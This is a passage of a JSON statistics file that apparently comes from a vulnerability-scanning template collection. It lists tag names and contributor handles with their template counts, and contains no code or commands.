"name":"advancedpopupcreator","count":1},{"name":"prestashop-module","count":1},{"name":"codeception","count":1},{"name":"uber","count":1},{"name":"fotka","count":1},{"name":"rss","count":1},{"name":"scrapingant","count":1},{"name":"intel","count":1},{"name":"reality","count":1},{"name":"chronoforums","count":1},{"name":"orangescrum","count":1},{"name":"datezone","count":1},{"name":"lokalise","count":1},{"name":"realtek","count":1},{"name":"dvdFab","count":1},{"name":"javafaces","count":1},{"name":"loganalyzer","count":1},{"name":"ipdiva","count":1},{"name":"openx","count":1},{"name":"microservice","count":1},{"name":"maroc-nl","count":1},{"name":"nnru","count":1},{"name":"radius","count":1},{"name":"pettingzooco-mastodon-instance","count":1},{"name":"a360inc","count":1},{"name":"presspage","count":1},{"name":"readtomyshoe_project","count":1},{"name":"vi","count":1},{"name":"slides","count":1},{"name":"taxonomies-change-checkbox-to-radio-buttons","count":1},{"name":"manyvids","count":1},{"name":"jsfiddle","count":1},{"name":"apasionados","count":1},{"name":"target","count":1},{"name":"ioncube","count":1},{"name":"filemage","count":1},{"name":"directum","count":1},{"name":"attenzione","count":1},{"name":"kakao","count":1},{"name":"opencti","count":1},{"name":"photoblocks","count":1},{"name":"vnc","count":1},{"name":"expose","count":1},{"name":"kindsoft","count":1},{"name":"prestahome","count":1},{"name":"webnms","count":1},{"name":"naviwebs","count":1},{"name":"h2database","count":1},{"name":"web-suite","count":1},{"name":"hostio","count":1},{"name":"ulterius","count":1},{"name":"grandnode","count":1},{"name":"homebridge","count":1},{"name":"narnoo_distributor_project","count":1},{"name":"playtube","count":1},{"name":"musictraveler","count":1},{"name":"mod-db","count":1},{"name":"sevone","count":1},{"name":"disqus","count":1},{"name":"osu","count":1},{"name":"wildcard","count":1},{"name":"satellite","count":1},{"name":"parler-archived-posts","count":1},{"name":"chromecast","count":1},{"name":"etouch","count":1},{"name":"sassy","count":1},{"name":"freelancetoindia","count":1},{"name":"runatlantis","count":1},{"name":"efak","count":1},{"name":"nimble","count":1},{"name":"mediakits","count":1},{"name":"login-as-customer-or-user","count":1},{"name":"mastodon","count":1},{"name":"rt-n16","count":1},{"name":"eureka","count":1},{"name":"kotburger","count":1},{"name":"b2bbuilder","count":1},{"name":"mastown-mastodon-instance","count":1},{"name":"hcl","count":1},{"name":"clustering","count":1},{"name":"skeepers","count":1},{"name":"master","count":1},{"name":"achecker","count":1},{"name":"bblog-ru","count":1},{"name":"asanhamayesh","count":1},{"name":"AlphaWeb","count":1},{"name":"sv3c","count":1},{"name":"epp","count":1},{"name":"weglot","count":1},{"name":"nazgul","count":1},{"name":"mitric","count":1},{"name":"phpnow","count":1},{"name":"xyxel","count":1},{"name":"gawk","count":1},{"name":"podcast_channels_project","count":1},{"name":"announcekit","count":1},{"name":"biostar2","count":1},{"name":"sceditor","count":1},{"name":"imageshack","count":1},{"name":"mylot","count":1},{"name":"jvtwitter","count":1},{"name":"view","count":1},{"name":"jorani_project","count":1},{"name":"inspireui","count":1},{"name":"opms","count":1},{"name":"cd-action","count":1},{"name":"remkon","count":1},{"name":"opengear","count":1},{"name":"dockge","count":1},{"name":"joommasters","count":1},{"name":"rtsp","count":1},{"name":"booking-calendar","count":1},{"name":"beardev","count":1},{"name":"japandict","count":1},{"name":"tcexam","count":1},{"name":"arris","count":1},{"name":"cliniccases","count":1},{"name":"imgur","count":1},{"name":"wp-guppy","count":1},{"name":"ziahamza","count":1},{"name":"adminset","count":1},{"name":"public","count":1},{"name":"minds","count":1},{"name":"Chase","count":1},{"name":"shoretel","count":1},{"name":"eurotel","count":1},{"name":"flyway","count":1},{"name":"phabricator","count":1},{"name":"pivotal_software","count":1},{"name":"altenergy","count":1},{"name":"saltapi","count":1},{"name":"twittee-text-tweet","count":1},{"name":"kopano","count":1},{"name":"openwire","count":1},{"name":"pulmi","count":1},{"name":"packetstrom","count":1},{"name":"calendly","count":1},{"name":"supervisord","count":1},{"name":"lgate","count":1},{"name":"cph2","count":1},{"name":"mystrom","count":1},{"name":"pillowfort","count":1},{"name":"activehelper","count":1},{"name":"swim_team_project","count":1},{"name":"zwave","count":1},{"name":"html2wp_project","count":1},{"name":"vlc-media","count":1},{"name":"shopex","count":1},{"name":"nextchat","count":1},{"name":"boka","count":1},{"name":"cmseasy","count":1},{"name":"nordpass","count":1},{"name":"nvrsolo","count":1},{"name":"alkacon","count":1},{"name":"spinnaker","count":1},{"name":"drone","count":1},{"name":"2kblater","count":1},{"name":"opengraphr","count":1},{"name":"flatpm","count":1},{"name":"wowjoomla","count":1},{"name":"code-garage","count":1},{"name":"rocklobster","count":1},{"name":"bittube","count":1},{"name":"fujitsu","count":1},{"name":"simpel-reserveren_project","count":1},{"name":"wp-fastest-cache","count":1},{"name":"header-footer-code-manager","count":1},{"name":"softvelum","count":1},{"name":"ricoh","count":1},{"name":"venomrat","count":1},{"name":"sympa","count":1},{"name":"campaignmonitor","count":1},{"name":"nzbget","count":1},{"name":"pahtool","count":1},{"name":"catchplugins","count":1},{"name":"johnmccollum","count":1},{"name":"wolni-slowianie","count":1},{"name":"blackduck","count":1},{"name":"provectus","count":1},{"name":"pichome","count":1},{"name":"gofile","count":1},{"name":"infographic-and-list-builder-ilist","count":1},{"name":"alcoda","count":1},{"name":"pushgateway","count":1},{"name":"helm","count":1},{"name":"udemy","count":1},{"name":"tmate","count":1},{"name":"guppy","count":1},{"name":"microcomputers","count":1},{"name":"acymailing","count":1},{"name":"codoforumrce","count":1},{"name":"lemlist","count":1},{"name":"jvm","count":1},{"name":"steller","count":1},{"name":"qantumthemes","count":1},{"name":"gn-publisher","count":1},{"name":"jk","count":1},{"name":"fxwebdesign","count":1},{"name":"mikoviny","count":1},{"name":"daily_prayer_time_project","count":1},{"name":"mastodon-tootcommunity","count":1},{"name":"linear","count":1},{"name":"wpswings","count":1},{"name":"bws-realty","count":1},{"name":"socomec","count":1},{"name":"wc-multivendor-marketplace","count":1},{"name":"wp-shoutbox-live-chat","count":1},{"name":"clearcom","count":1},{"name":"estream","count":1},{"name":"m-files","count":1},{"name":"99robots","count":1},{"name":"luracast","count":1},{"name":"amtythumb_project","count":1},{"name":"schools_alert_management_script_project","count":1},{"name":"cerebro","count":1},{"name":"ns","count":1},{"name":"h-sphere","count":1},{"name":"webgrind","count":1},{"name":"zenscrape","count":1},{"name":"cherokee","count":1},{"name":"ogc","count":1},{"name":"pantsel","count":1},{"name":"fandalism","count":1},{"name":"adultism","count":1},{"name":"defectdojo","count":1},{"name":"duckduckgo","count":1},{"name":"lightdash","count":1},{"name":"mobotix","count":1},{"name":"xploitspy","count":1},{"name":"automatisch","count":1},{"name":"myportfolio","count":1},{"name":"eyoumail","count":1},{"name":"rudder","count":1},{"name":"sporcle","count":1},{"name":"myfitnesspal-community","count":1},{"name":"soccitizen4eu","count":1},{"name":"myvuehelp","count":1},{"name":"h3c-imc","count":1},{"name":"hydracrypt","count":1},{"name":"kernel","count":1},{"name":"checklist","count":1},{"name":"webpconverter","count":1},{"name":"hiberworld","count":1},{"name":"arduino","count":1},{"name":"bdsmlr","count":1},{"name":"redbubble","count":1},{"name":"nsq","count":1},{"name":"bws-adpush","count":1},{"name":"vsftpd","count":1},{"name":"smartsense","count":1},{"name":"ap-pricing-tables-lite","count":1},{"name":"quick-event-manager","count":1},{"name":"teradici","count":1},{"name":"mixi","count":1},{"name":"maccmsv10","count":1},{"name":"bws-google-maps","count":1},{"name":"dgtl","count":1},{"name":"thinkupthemes","count":1},{"name":"anycomment","count":1},{"name":"mariadb","count":1},{"name":"jalios","count":1},{"name":"planetestream","count":1},{"name":"registry","count":1},{"name":"mastoai","count":1},{"name":"fastapi","count":1},{"name":"redlion","count":1},{"name":"orchard","count":1},{"name":"themeinprogress","count":1},{"name":"anyproxy","count":1},{"name":"customize-login-image","count":1},{"name":"mura","count":1},{"name":"cal","count":1},{"name":"mx","count":1},{"name":"pihole","count":1},{"name":"soundcloud","count":1},{"name":"ups","count":1},{"name":"linshare","count":1},{"name":"bitcoin","count":1},{"name":"wbcecms","count":1},{"name":"yellowfin","count":1},{"name":"joobi","count":1},{"name":"nexusdb","count":1},{"name":"openbb","count":1},{"name":"toolkit","count":1},{"name":"shirnecms","count":1},{"name":"rpmdb","count":1},{"name":"monitorix","count":1},{"name":"piratebay","count":1},{"name":"image-optimizer-wd","count":1},{"name":"easyappointments","count":1},{"name":"magix","count":1},{"name":"phpsocialnetwork","count":1},{"name":"fedora","count":1},{"name":"shortpixel-adaptive-images","count":1},{"name":"authorstream","count":1},{"name":"intellislot","count":1},{"name":"fandom","count":1},{"name":"appserv_open_project","count":1},{"name":"codeastrology","count":1},{"name":"rujjie","count":1},{"name":"get-simple.","count":1},{"name":"openerp","count":1},{"name":"showcase","count":1},{"name":"spidercontrol","count":1},{"name":"vine","count":1},{"name":"isecure","count":1},{"name":"icegram","count":1},{"name":"localize_my_post_project","count":1}],"authors":[{"name":"dhiyaneshdk","count":1289},{"name":"daffainfo","count":864},{"name":"dwisiswant0","count":803},{"name":"pussycat0x","count":354},{"name":"pikpikcu","count":353},{"name":"ritikchaddha","count":346},{"name":"pdteam","count":297},{"name":"princechaddha","count":269},{"name":"ricardomaia","count":232},{"name":"geeknik","count":231},{"name":"theamanrawat","count":223},{"name":"r3y3r53","count":200},{"name":"0x_akoko","count":179},{"name":"gy741","count":158},{"name":"rxerium","count":142},{"name":"righettod","count":141},{"name":"sleepingbag945","count":132},{"name":"arafatansari","count":118},{"name":"tess","count":109},{"name":"pdresearch","count":82},{"name":"iamnoooob","count":69},{"name":"idealphase","count":66},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"rootxharsh","count":62},{"name":"akincibor","count":59},{"name":"for3stco1d","count":55},{"name":"philippedelteil","count":53},{"name":"gaurang","count":42},{"name":"edoardottt","count":42},{"name":"johnk3r","count":41},{"name":"c-sh0","count":35},{"name":"j4vaovo","count":35},{"name":"adam crosser","count":31},{"name":"luisfelipe146","count":31},{"name":"mastercho","count":29},{"name":"ice3man","count":29},{"name":"pwnhxl","count":28},{"name":"hardik-solanki","count":24},{"name":"organiccrap","count":24},{"name":"techbrunchfr","count":23},{"name":"ctflearner","count":23},{"name":"harsh","count":23},{"name":"ffffffff0x","count":22},{"name":"parthmalhotra","count":20},{"name":"sullo","count":18},{"name":"kazgangap","count":18},{"name":"cckuailong","count":18},{"name":"bhutch","count":17},{"name":"random-robbie","count":16},{"name":"shaikhyaser","count":16},{"name":"0xpugazh","count":16},{"name":"lu4nx","count":16},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"unapibageek","count":15},{"name":"dogasantos","count":14},{"name":"tenbird","count":14},{"name":"milo2012","count":14},{"name":"userdehghani","count":14},{"name":"r3dg33k","count":14},{"name":"elsfa7110","count":13},{"name":"0ri2n","count":13},{"name":"sharath","count":13},{"name":"theabhinavgaur","count":13},{"name":"melbadry9","count":13},{"name":"nullfuzz","count":13},{"name":"meme-lord","count":12},{"name":"kazet","count":12},{"name":"suman_kar","count":12},{"name":"wdahlenb","count":11},{"name":"cyllective","count":11},{"name":"co5mos","count":10},{"name":"0x240x23elu","count":10},{"name":"random_robbie","count":10},{"name":"hackergautam","count":10},{"name":"nadino","count":10},{"name":"logicalhunter","count":10},{"name":"alph4byt3","count":10},{"name":"oppsec","count":9},{"name":"emadshanab","count":9},{"name":"olearycrew","count":9},{"name":"adamcrosser","count":9},{"name":"momika233","count":9},{"name":"initstring","count":9},{"name":"fabaff","count":9},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"irshad ahamed","count":8},{"name":"noraj","count":8},{"name":"_0xf4n9x_","count":8},{"name":"that_juan_","count":8},{"name":"veshraj","count":8},{"name":"its0x08","count":7},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":7},{"name":"huta0","count":7},{"name":"harshbothra_","count":7},{"name":"randomstr1ng","count":7},{"name":"tarunkoyalwar","count":7},{"name":"caspergn","count":7},{"name":"divya_mudgal","count":7},{"name":"amit-jd","count":7},{"name":"nodauf","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"leovalcante","count":7},{"name":"dr_set","count":7},{"name":"clem9669","count":6},{"name":"byt3bl33d3r","count":6},{"name":"devang-solanki","count":6},{"name":"megamansec","count":6},{"name":"ja1sh","count":6},{"name":"imnightmaree","count":6},{"name":"hahwul","count":6},{"name":"forgedhallpass","count":6},{"name":"__fazal","count":6},{"name":"evan rubinstein","count":6},{"name":"pathtaga","count":6},{"name":"pentest_swissky","count":6},{"name":"gitlab red team","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"puzzlepeaches","count":6},{"name":"justaacat","count":6},{"name":"xelkomy","count":6},{"name":"robotshell","count":5},{"name":"podalirius","count":5},{"name":"r12w4n","count":5},{"name":"vicrack","count":5},{"name":"arm!tage","count":5},{"name":"gtrrnr","count":5},{"name":"mr-xn","count":5},{"name":"your3cho","count":5},{"name":"panch0r3d","count":5},{"name":"defr0ggy","count":5},{"name":"prajiteshsingh","count":5},{"name":"kh4sh3i","count":5},{"name":"shine","count":5},{"name":"s0obi","count":5},{"name":"r3naissance","count":5},{"name":"andreluna","count":5},{"name":"yanyun","count":5},{"name":"powerexploit","count":5},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"lucky0x0d","count":5},{"name":"pulsesecurity.co.nz","count":4},{"name":"jpg0mez","count":4},{"name":"iamnooob","count":4},{"name":"king-alexander","count":4},{"name":"dadevel","count":4},{"name":"scent2d","count":4},{"name":"lum8rjack","count":4},{"name":"ice3man543","count":4},{"name":"e_schultze_","count":4},{"name":"nybble04","count":4},{"name":"wisnupramoedya","count":4},{"name":"cookiehanhoan","count":4},{"name":"tanq16","count":4},{"name":"shankar acharya","count":4},{"name":"incogbyte","count":4},{"name":"m4lwhere","count":4},{"name":"h1ei1","count":4},{"name":"k0pak4","count":4},{"name":"3th1c_yuk1","count":4},{"name":"heeress","count":4},{"name":"xxcdd","count":4},{"name":"0xr2r","count":4},{"name":"ggranjus","count":4},{"name":"dolev farhi","count":4},{"name":"randomrobbie","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"jarijaas","count":3},{"name":"fyoorer","count":3},{"name":"salts","count":3},{"name":"evergreencartoons","count":3},{"name":"mavericknerd","count":3},{"name":"arcc","count":3},{"name":"bernardofsr","count":3},{"name":"c4sper0","count":3},{"name":"shifacyclewala","count":3},{"name":"e1a","count":3},{"name":"emenalf","count":3},{"name":"badboycxcc","count":3},{"name":"imjust0","count":3},{"name":"vsh00t","count":3},{"name":"lark-lab","count":3},{"name":"binaryfigments","count":3},{"name":"j3ssie","count":3},{"name":"isacaya","count":3},{"name":"splint3r7","count":3},{"name":"ekrause","count":3},{"name":"canberbamber","count":3},{"name":"matt galligan","count":3},{"name":"impramodsargar","count":3},{"name":"whoever","count":3},{"name":"unstabl3","count":3},{"name":"parth","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"sushantkamble","count":3},{"name":"lucasljm2001","count":3},{"name":"ph33r","count":3},{"name":"johnjhacking","count":3},{"name":"davidmckennirey","count":3},{"name":"dr0pd34d","count":3},{"name":"alifathi-h1","count":3},{"name":"aringo","count":3},{"name":"cheesymoon","count":3},{"name":"true13","count":3},{"name":"z3bd","count":3},{"name":"flx","count":3},{"name":"xianke","count":3},{"name":"fxploit","count":3},{"name":"huowuzhao","count":3},{"name":"thomas_from_offensity","count":3},{"name":"_generic_human_","count":3},{"name":"me9187","count":3},{"name":"skeltavik","count":3},{"name":"vagnerd","count":3},{"name":"coldfish","count":3},{"name":"farish","count":3},{"name":"dudez","count":3},{"name":"andydoering","count":3},{"name":"0w4ys","count":3},{"name":"atomiczsec","count":3},{"name":"taielab","count":3},{"name":"f1tz","count":3},{"name":"swissky","count":3},{"name":"ambassify","count":3},{"name":"hackerarpan","count":2},{"name":"ayadim","count":2},{"name":"lotusdll","count":2},{"name":"ep1csage","count":2},{"name":"notnotnotveg","count":2},{"name":"cocxanh","count":2},{"name":"pbuff07","count":2},{"name":"joshlarsen","count":2},{"name":"randomdhiraj","count":2},{"name":"dbrwsky","count":2},{"name":"liwermor","count":2},{"name":"sascha brendel","count":2},{"name":"florianmaak","count":2},{"name":"dahse89","count":2},{"name":"zomsop82","count":2},{"name":"convisoappsec","count":2},{"name":"y4er","count":2},{"name":"0xelkomy","count":2},{"name":"vavkamil","count":2},{"name":"brenocss","count":2},{"name":"sinkettu","count":2},{"name":"g4l1t0","count":2},{"name":"cckuakilong","count":2},{"name":"paperpen","count":2},{"name":"6mile","count":2},{"name":"pxmme1337","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"mrharshvardhan","count":2},{"name":"myztique","count":2},{"name":"nkxxkn","count":2},{"name":"sy3omda","count":2},{"name":"danielmofer","count":2},{"name":"k11h-de","count":2},{"name":"shelled","count":2},{"name":"c3l3si4n","count":2},{"name":"hetroublemakr","count":2},{"name":"amsda","count":2},{"name":"parzival","count":2},{"name":"kre80r","count":2},{"name":"v0idc0de","count":2},{"name":"streetofhackerr007","count":2},{"name":"nuk3s3c","count":2},{"name":"dheerajmadhukar","count":2},{"name":"amirhossein raeisi","count":2},{"name":"supras","count":2},{"name":"rafaelwdornelas","count":2},{"name":"kiblyn11","count":2},{"name":"uomogrande","count":2},{"name":"sbani","count":2},{"name":"0xsapra","count":2},{"name":"mzack9999","count":2},{"name":"herry","count":2},{"name":"christianpoeschl","count":2},{"name":"luci","count":2},{"name":"github.com/its0x08","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"zy9ard3","count":2},{"name":"koti2","count":2},{"name":"charles d.","count":2},{"name":"bing0o","count":2},{"name":"ree4pwn","count":2},{"name":"udit_thakkur","count":2},{"name":"0xsmiley","count":2},{"name":"supr4s","count":2},{"name":"danmcinerney","count":2},{"name":"t3l3machus","count":2},{"name":"egemenkochisarli","count":2},{"name":"666asd","count":2},{"name":"w4cky_","count":2},{"name":"foulenzer","count":2},{"name":"d4vy","count":2},{"name":"korteke","count":2},{"name":"thabisocn","count":2},{"name":"gal nagli","count":2},{"name":"gevakun","count":2},{"name":"bmcel","count":2},{"name":"ajaysenr","count":2},{"name":"manas_harsh","count":2},{"name":"ehsahil","count":2},{"name":"codexlynx","count":2},{"name":"msegoviag","count":2},{"name":"michal mikolas (nanuqcz)","count":2},{"name":"joshua rogers","count":2},{"name":"redteambrasil","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"x1m_martijn","count":2},{"name":"bp0lr","count":2},{"name":"socketz","count":2},{"name":"thardt-praetorian","count":2},{"name":"0xcrypto","count":2},{"name":"nvn1729","count":2},{"name":"0xrudra","count":2},{"name":"serrapa","count":2},{"name":"shankaracharya","count":2},{"name":"8arthur","count":2},{"name":"joeldeleep","count":2},{"name":"thevillagehacker","count":2},{"name":"wa1tf0rme","count":2},{"name":"paradessia","count":2},{"name":"bsysop","count":2},{"name":"martincodes-de","count":2},{"name":"davidegirardi","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"bananabr","count":2},{"name":"mohammedsaneem","count":2},{"name":"dogancanbakir","count":2},{"name":"clarkvoss","count":2},{"name":"lstatro","count":2},{"name":"geekby","count":2},{"name":"brucelsone","count":2},{"name":"arliya","count":2},{"name":"n-thumann","count":2},{"name":"usdag","count":2},{"name":"z0ne","count":2},{"name":"0xnirvana","count":2},{"name":"maximus decimus","count":2},{"name":"kishore-hariram","count":2},{"name":"h0j3n","count":2},{"name":"raesene","count":2},{"name":"thezakman","count":2},{"name":"afaq","count":2},{"name":"moritz nentwig","count":2},{"name":"jbaines-r7","count":1},{"name":"retr0","count":1},{"name":"luskabol","count":1},{"name":"shifacyclewla","count":1},{"name":"xeldax","count":1},{"name":"kagamigawa","count":1},{"name":"y0no","count":1},{"name":"null_hypothesis","count":1},{"name":"mr.bobo hp","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"rotembar","count":1},{"name":"8authur","count":1},{"name":"colbyjack1134","count":1},{"name":"tangxiaofeng7","count":1},{"name":"amirmsafari","count":1},{"name":"shelld3v","count":1},{"name":"0xceeb","count":1},{"name":"revblock","count":1},{"name":"rivalsec","count":1},{"name":"sospiro","count":1},{"name":"soyelmago","count":1},{"name":"mihhailsokolov","count":1},{"name":"mesaglio","count":1},{"name":"kr1shna4garwal","count":1},{"name":"d0rkerdevil","count":1},{"name":"fq_hsu","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"andysvints","count":1},{"name":"elmahdi","count":1},{"name":"osamahamad","count":1},{"name":"galoget","count":1},{"name":"opencirt","count":1},{"name":"yiran","count":1},{"name":"sak1","count":1},{"name":"ransomsec","count":1},{"name":"francescocarlucci","count":1},{"name":"fpatrik","count":1},{"name":"geraldino2","count":1},{"name":"elouhi","count":1},{"name":"kaizensecurity","count":1},{"name":"rschio","count":1},{"name":"hardik-rathod","count":1},{"name":"failopen","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"ling","count":1},{"name":"bad5ect0r","count":1},{"name":"zeyad azima","count":1},{"name":"christbowel","count":1},{"name":"drfabiocastro","count":1},{"name":"josecosta","count":1},{"name":"andirrahmani1","count":1},{"name":"miguelsegoviagil","count":1},{"name":"vzamanillo","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"furkansayim","count":1},{"name":"toufik-airane","count":1},{"name":"mass0ma","count":1},{"name":"amir-h-fallahi","count":1},{"name":"dabla","count":1},{"name":"napgh0st","count":1},{"name":"udinchan","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"alevsk","count":1},{"name":"piyushchhiroliya","count":1},{"name":"s1r1u5_","count":1},{"name":"vikas kundu","count":1},{"name":"0xteles","count":1},{"name":"b4uh0lz","count":1},{"name":"exploitation","count":1},{"name":"noamrathaus","count":1},{"name":"arall","count":1},{"name":"mah3sec_","count":1},{"name":"r3nz0","count":1},{"name":"domenicoveneziano","count":1},{"name":"cbadke","count":1},{"name":"chetgan","count":1},{"name":"jfbes","count":1},{"name":"rodnt","count":1},{"name":"archer","count":1},{"name":"axrk","count":1},{"name":"guax1","count":1},{"name":"jaimin gondaliya","count":1},{"name":"arqsz","count":1},{"name":"_c0wb0y_","count":1},{"name":"lethargynavigator","count":1},{"name":"pratik khalane","count":1},{"name":"bjhulst","count":1},{"name":"ap3r","count":1},{"name":"furkansenan","count":1},{"name":"x6263","count":1},{"name":"freakyclown","count":1},{"name":"adilsoybali","count":1},{"name":"duty_1g","count":1},{"name":"absshax","count":1},{"name":"yashanand155","count":1},{"name":"none","count":1},{"name":"omarjezi","count":1},{"name":"booboohq","count":1},{"name":"notsoevilweasel","count":1},{"name":"millermedia","count":1},{"name":"marcos_iaf","count":1},{"name":"aringo-bf","count":1},{"name":"charanrayudu","count":1},{"name":"carrot2","count":1},{"name":"aravind","count":1},{"name":"palanichamy_perumal","count":1},{"name":"af001","count":1},{"name":"willd96","count":1},{"name":"izn0u","count":1},{"name":"petruknisme","count":1},{"name":"hexcat","count":1},{"name":"diablo","count":1},{"name":"mlec","count":1},{"name":"dk999","count":1},{"name":"hczdmr","count":1},{"name":"fur1na","count":1},{"name":"intx0x80","count":1},{"name":"abbas.heybati","count":1},{"name":"irshadahamed","count":1},{"name":"akokonunes","count":1},{"name":"viondexd","count":1},{"name":"kiks7","count":1},{"name":"mukundbhuva","count":1},{"name":"nagli","count":1},{"name":"luqman","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"whotwagner","count":1},{"name":"whynotke","count":1},{"name":"tirtha","count":1},{"name":"jonathanwalker","count":1},{"name":"undefl0w","count":1},{"name":"jas37","count":1},{"name":"compr00t","count":1},{"name":"fmunozs","count":1},{"name":"bugvsme","count":1},{"name":"danigoland","count":1},{"name":"mammad_rahimzada","count":1},{"name":"breno_css","count":1},{"name":"w0tx","count":1},{"name":"0xceba","count":1},{"name":"alperenkesk","count":1},{"name":"kiransau","count":1},{"name":"shiar","count":1},{"name":"unp4ck","count":1},{"name":"w8ay","count":1},{"name":"aayush vishnoi","count":1},{"name":"wlayzz","count":1},{"name":"banana69","count":1},{"name":"caon","count":1},{"name":"noah @thesubtlety","count":1},{"name":"becivells","count":1},{"name":"r3s ost","count":1},{"name":"higor melgaço","count":1},{"name":"xc1ym","count":1},{"name":"esonhugh","count":1},{"name":"sttlr","count":1},{"name":"iphantasmic","count":1},{"name":"brabbit10","count":1},{"name":"petergrifin","count":1},{"name":"therealtoastycat","count":1},{"name":"h4kux","count":1},{"name":"topscoder","count":1},{"name":"jcockhren","count":1},{"name":"lbb","count":1},{"name":"evolutionsec","count":1},{"name":"thebinitghimire","count":1},{"name":"0ut0fb4nd","count":1},{"name":"ramondunker","count":1},{"name":"droberson","count":1},{"name":"1nf1n7y","count":1},{"name":"unknown","count":1},{"name":"infosecsanyam","count":1},{"name":"_harleo","count":1},{"name":"d4ly","count":1},{"name":"hanlaomo","count":1},{"name":"puben","count":1},{"name":"ndmalc","count":1},{"name":"official_blackhat13","count":1},{"name":"act1on3","count":1},{"name":"ringo","count":1},{"name":"deena","count":1},{"name":"wpsec","count":1},{"name":"open-sec","count":1},{"name":"ola456","count":1},{"name":"amanrawat","count":1},{"name":"kailashbohara","count":1},{"name":"lrtk-coder","count":1},{"name":"patralos","count":1},{"name":"igibanez","count":1},{"name":"smaranchand","count":1},{"name":"ahmed sherif","count":1},{"name":"0h1in9e","count":1},{"name":"micha3lb3n","count":1},{"name":"houdinis","count":1},{"name":"erethon","count":1},{"name":"jaskaran","count":1},{"name":"carson chan","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"akash.c","count":1},{"name":"wabafet","count":1},{"name":"0xtavian","count":1},{"name":"thirukrishnan","count":1},{"name":"dievus","count":1},{"name":"ofjaaah","count":1},{"name":"hakluke","count":1},{"name":"majidmc2","count":1},{"name":"viniciuspereiras","count":1},{"name":"dwbzn","count":1},{"name":"tea","count":1},{"name":"hateshape","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"sorrowx3","count":1},{"name":"arr0way","count":1},{"name":"aron molnar","count":1},{"name":"retr02332","count":1},{"name":"qianbenhyu","count":1},{"name":"harshinsecurity","count":1},{"name":"apt-mirror","count":1},{"name":"matt miller","count":1},{"name":"floriandewald","count":1},{"name":"akshansh","count":1},{"name":"0xrod","count":1},{"name":"hotpot","count":1},{"name":"skylark-lab","count":1},{"name":"hazana","count":1},{"name":"aresx","count":1},{"name":"myst7ic","count":1},{"name":"ooooooo_q","count":1},{"name":"bywalks","count":1},{"name":"aaronchen0","count":1},{"name":"mchklt","count":1},{"name":"0xparth","count":1},{"name":"ayadi","count":1},{"name":"rumble773","count":1},{"name":"shockwave","count":1},{"name":"zhenwarx","count":1},{"name":"babybash","count":1},{"name":"jteles","count":1},{"name":"sdcampbell","count":1},{"name":"k3rwin","count":1},{"name":"mabdullah22","count":1},{"name":"arjunchandarana","count":1},{"name":"luqmaan hadia","count":1},{"name":"paper-pen","count":1},{"name":"hlop","count":1},{"name":"qlkwej","count":1},{"name":"savik","count":1},{"name":"ky9oss","count":1},{"name":"djoevanka","count":1},{"name":"rotemreiss","count":1},{"name":"flag007","count":1},{"name":"tirtha_mandal","count":1},{"name":"hyunsoo-ds","count":1},{"name":"jeya seelan","count":1},{"name":"lady_bug","count":1},{"name":"lark lab","count":1},{"name":"natto97","count":1},{"name":"jrolf","count":1},{"name":"alex","count":1},{"name":"miryangjung","count":1},{"name":"davidfegyver","count":1},{"name":"mayankpandey01","count":1},{"name":"luciannitescu","count":1},{"name":"sshell","count":1},{"name":"west-wise","count":1},{"name":"sinsinology","count":1},{"name":"sherlocksecurity","count":1},{"name":"shivanshkhari","count":1},{"name":"sickwell","count":1},{"name":"oscarintherocks","count":1},{"name":"bartu utku sarp","count":1},{"name":"juicypotato1","count":1},{"name":"p-l-","count":1},{"name":"yusakie","count":1},{"name":"elder tao","count":1},{"name":"imhunterand","count":1},{"name":"stupidfish","count":1},{"name":"dali","count":1},{"name":"screamy","count":1},{"name":"denandz","count":1},{"name":"phillipo","count":1},{"name":"nytr0gen","count":1},{"name":"unkl4b","count":1},{"name":"evan rubinstien","count":1},{"name":"daffianfo","count":1},{"name":"mubassirpatel","count":1},{"name":"s1r1us","count":1},{"name":"queencitycyber","count":1},{"name":"f1she3","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"kurohost","count":1},{"name":"aaban solutions","count":1},{"name":"olewagner","count":1},{"name":"regala_","count":1},{"name":"exid","count":1},{"name":"blckraven","count":1},{"name":"nielsing","count":1},{"name":"lingtren","count":1},{"name":"mordavid","count":1},{"name":"0xd0ff9","count":1},{"name":"xstp","count":1},{"name":"orpheus","count":1},{"name":"carlosvieira","count":1},{"name":"gpiechnik2","count":1},{"name":"pphuahua","count":1},{"name":"jc175","count":1},{"name":"momen eldawakhly","count":1},{"name":"pwnwithlove","count":1},{"name":"nobody","count":1},{"name":"elitebaz","count":1},{"name":"5up3r541y4n","count":1},{"name":"yuansec","count":1},{"name":"michal-mikolas","count":1},{"name":"ilovebinbash","count":1},{"name":"schniggie","count":1},{"name":"pjborah","count":1},{"name":"sanineng","count":1},{"name":"husain","count":1},{"name":"kresec","count":1},{"name":"ahmed abou-ela","count":1},{"name":"dorkerdevil","count":1},{"name":"berkdusunur","count":1},{"name":"zinminphy0","count":1},{"name":"push4d","count":1},{"name":"0xkayala","count":1},{"name":"miroslavsotak","count":1},{"name":"amnotacat","count":1},{"name":"william söderberg @ 